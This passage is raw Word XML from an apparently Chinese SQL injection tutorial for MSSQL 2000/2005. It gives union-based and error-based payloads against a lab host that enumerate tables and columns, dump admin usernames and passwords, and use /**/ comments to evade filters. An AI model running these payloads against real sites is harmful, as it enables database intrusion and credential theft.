          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="00626F35" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> top 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name from </w:t>
      </w:r>
      <w:r w:rsidR="00626F35" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(select top 1 name from sysobjects where xtype=0x75 order by name) t order by name desc),3</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromsysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365437AE" w14:textId="77777777" w:rsidR="00CB35DE" w:rsidRPr="00276D91" w:rsidRDefault="000D3E3A" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E47A0C8" wp14:editId="0CEFE802">
            <wp:extent cx="5274310" cy="4621221"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="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5274310" cy="4621221"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8EE58" w14:textId="77777777" w:rsidR="0036062B" w:rsidRPr="00764DAB" w:rsidRDefault="0036062B"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其中0x75是u的十六进制，增加n数字的值，就可以得到当前数据库的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C8189" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="0036062B"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如果要跨库查询其他数据库的表名，则可替换为如下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D216E5" w14:textId="77777777" w:rsidR="00EE3A81" w:rsidRPr="00644363" w:rsidRDefault="00EE3A8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 xml:space="preserve">(select top 1 name from (select top n name from </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库..</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysobjects where xtype=0x75 order by name) t order by name desc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C53CE2" w14:textId="77777777" w:rsidR="00EE3A81" w:rsidRPr="00764DAB" w:rsidRDefault="00EE3A81"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或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BDA74F" w14:textId="77777777" w:rsidR="00EE3A81" w:rsidRPr="00644363" w:rsidRDefault="00EE3A8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 xml:space="preserve">(select top 1 name from </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[数据库名</w:t>
      </w:r>
      <w:r w:rsidR="00645739" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysobjects where xtype=</w:t>
      </w:r>
      <w:r w:rsidR="0047008E" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’u’</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and name not in(select top n name from</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[数据库名]</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> sysobjects where xtype=</w:t>
      </w:r>
      <w:r w:rsidR="0047008E" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’u’</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C84942" w14:textId="77777777" w:rsidR="00D3600C" w:rsidRPr="00764DAB" w:rsidRDefault="00D3600C"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增加n数字的值，就可以查询指定数据库的所有表名了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF2E5C" w14:textId="77777777" w:rsidR="00D3600C" w:rsidRPr="00276D91" w:rsidRDefault="00D3600C"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5.查询字段名及字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9260E8" w14:textId="77777777" w:rsidR="00EE3A81" w:rsidRPr="00764DAB" w:rsidRDefault="00D3600C"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将数字或字符处替换成如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C63D1" w14:textId="77777777" w:rsidR="00B81319" w:rsidRPr="00644363" w:rsidRDefault="00B81319"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select col_name(object_id('表名'),n))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE4A54" w14:textId="77777777" w:rsidR="00034DF3" w:rsidRPr="00764DAB" w:rsidRDefault="00291569"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00034DF3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1 and 1=2 union all select 1,(select col_name(object_id('admin'),</w:t>
      </w:r>
      <w:r w:rsidR="00034DF3" w:rsidRPr="009C0D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00034DF3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)),3 from sysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376646AB" w14:textId="77777777" w:rsidR="00291569" w:rsidRPr="00276D91" w:rsidRDefault="00E91824" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA455E9" wp14:editId="3D80CCE5">
            <wp:extent cx="5274310" cy="3493858"/>
            <wp:effectExtent l="19050" t="0" r="2540"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274310" cy="3493858"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1D2E7" w14:textId="77777777" w:rsidR="001366CF" w:rsidRPr="00764DAB" w:rsidRDefault="001366CF"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增加数字n的值，就可以得到表中的所有字段名了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F4DE61" w14:textId="77777777" w:rsidR="009C283A" w:rsidRPr="00764DAB" w:rsidRDefault="009C2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 and 1=2 union all select 1,(select col_name(object_id('admin'),</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)),3 from sysobjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E040FBE" w14:textId="77777777" w:rsidR="002B0FB4" w:rsidRDefault="009C283A" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114153B2" wp14:editId="123499BA">
            <wp:extent cx="5274310" cy="3893149"/>
            <wp:effectExtent l="19050" t="0" r="2540"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5274310" cy="3893149"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCEA6D" w14:textId="77777777" w:rsidR="001366CF" w:rsidRPr="00764DAB" w:rsidRDefault="001366CF"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要获取字段内容，可将数字或字符处替换为如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A41EC" w14:textId="77777777" w:rsidR="002B0FB4" w:rsidRPr="00644363" w:rsidRDefault="00B9334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selcet top 1 字段名 from 表名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FCAFD" w14:textId="77777777" w:rsidR="00756EA7" w:rsidRPr="001A202D" w:rsidRDefault="002B0FB4" w:rsidP="001A202D">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 and 1=2 union all select 1,(select top 1 name</w:t>
      </w:r>
      <w:r w:rsidR="001A202D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from admin),3 from sysobjects </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FAEDA0" w14:textId="77777777" w:rsidR="002B0FB4" w:rsidRPr="00276D91" w:rsidRDefault="002B0FB4" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FA21AE" wp14:editId="44EAD106">
            <wp:extent cx="5274310" cy="2647950"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="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5274310" cy="2647950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B0949" w14:textId="77777777" w:rsidR="00910D66" w:rsidRPr="00764DAB" w:rsidRDefault="00910D66"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得到第一个字段值后，再提交下面的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D202085" w14:textId="77777777" w:rsidR="00160B48" w:rsidRPr="00644363" w:rsidRDefault="00160B48"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selcet top 1 字段名 from 表名 where 字段名&lt;&gt;字段值1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148C507B" w14:textId="77777777" w:rsidR="00756EA7" w:rsidRPr="00764DAB" w:rsidRDefault="00756EA7"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例如：</w:t>
      </w:r>
      <w:r w:rsidR="00915F49" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.55/sqlserver/1.aspx?xxser=1and 1=2 union all select 1,(select top 1 passWord from admin where name='yuan'),3 from sysobjects  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F84111" w14:textId="77777777" w:rsidR="00FE16E0" w:rsidRPr="001A202D" w:rsidRDefault="004A74C5" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F61B196" wp14:editId="61E6C299">
            <wp:extent cx="5274310" cy="3304789"/>
            <wp:effectExtent l="19050" t="0" r="254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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3304789"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE526D4" w14:textId="77777777" w:rsidR="00FE16E0" w:rsidRPr="00764DAB" w:rsidRDefault="00FE16E0"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如果想同时返回用户名与密码,可以提交如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F844F" w14:textId="77777777" w:rsidR="00FE16E0" w:rsidRPr="001A202D" w:rsidRDefault="00FE16E0" w:rsidP="001A202D">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 and 1=2 union all select 1,(select top 1 isnull(cast([name] as nvarchar(100)),char(32))%2bchar(94)%2bisnull(cast ([password] as nvarchar(100)),char(32)) fr</w:t>
      </w:r>
      <w:r w:rsidR="001A202D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">om [admin]),3 from sysobjects  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5396C1" w14:textId="77777777" w:rsidR="00FE16E0" w:rsidRPr="00764DAB" w:rsidRDefault="00FE16E0"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接着再提交如下查询,就可以查询第二个用户名及密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB2B9B" w14:textId="77777777" w:rsidR="004A74C5" w:rsidRPr="00764DAB" w:rsidRDefault="00FE16E0"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 xml:space="preserve">http://192.168.1.55/sqlserver/1.aspx?xxser=1 and 1=2 union all select 1,(select top 1 isnull(cast([name] as nvarchar(100)),char(32))%2bchar(94)%2bisnull(cast ([password] as nvarchar(100)),char(32)) from [admin]),where 1=1 and name not in(select top 1 name from admin)),3 from sysobjects  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51548358" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="007A3EA2" w:rsidRDefault="00874ADB" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3EA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MsSQL 2005注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F9CFD" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00874ADB"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MsSQL 2005数据库的注入攻击与MsSQL 2000及之前的版本有类似的地方，但是由于版本不同，因此也不完全一样。在本节中将对MsSQL 2005数据库注入攻击技术，进行一下简单的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D765D77" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="0052724F"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MsSQL 2005数据库注入攻击主要分为两种类型，一种是显错模式，另一种是不显错模式。对于数据库返回错误信息的显错模式，可以直接爆出数据库内容，不返回错误信息时，则通常利用盲注入攻击手法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC89FA" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="007A3EA2"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3.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00497C2E" w:rsidRPr="007A3EA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>判断MsSQL 2005数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D761D4E" w14:textId="77777777" w:rsidR="00C03573" w:rsidRPr="00764DAB" w:rsidRDefault="00C03573"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首先，要判断注入点是否为MsSQL 2005数据库，在MsSQL注入点处提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574EF8E0" w14:textId="77777777" w:rsidR="00C03573" w:rsidRPr="00764DAB" w:rsidRDefault="00C03573"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and substring((select @@version),22,4)='2005'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE846B" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00C03573"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如果页面返回正常，则说明数据库版本为MsSQL 2005。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411AA495" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="0077771D"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3.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C6FF1" w:rsidRPr="0077771D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQL 2005显错模式下爆数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628CC4F" w14:textId="77777777" w:rsidR="00B6254E" w:rsidRPr="00764DAB" w:rsidRDefault="00B6254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先来看看数据库返回错误信息情况下的注入语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5632C6EB" w14:textId="77777777" w:rsidR="00B6254E" w:rsidRPr="00276D91" w:rsidRDefault="00B6254E"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爆数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75060580" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00B6254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注入查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E016E" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00644363" w:rsidRDefault="0064258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and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D28B9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/**/dbid/**/from/**</w:t>
      </w:r>
      <w:r w:rsidR="000962B8" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B598B3D" w14:textId="77777777" w:rsidR="00DC1F7E" w:rsidRPr="00276D91" w:rsidRDefault="00DC1F7E" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CC45234" wp14:editId="429280F0">
            <wp:extent cx="5274310" cy="2191831"/>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274310" cy="2191831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="453F786E" w14:textId="77777777" w:rsidR="00731F5E" w:rsidRPr="00764DAB" w:rsidRDefault="00731F5E"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在上面的查询语句中，/**/用来代替空格，以绕过防注入过滤程序。修改增加黑色部分的数字，就可以逐个猜出所有数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBF991" w14:textId="77777777" w:rsidR="00731F5E" w:rsidRPr="00276D91" w:rsidRDefault="00731F5E"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lastRenderedPageBreak/>
        <w:t>2.爆数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A1EED8" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00731F5E"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注入查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46548CAA" w14:textId="77777777" w:rsidR="0080071A" w:rsidRPr="00764DAB" w:rsidRDefault="0080071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select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D28B9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/**/name/**/from/**/数据库名</w:t>
      </w:r>
    </w:p>
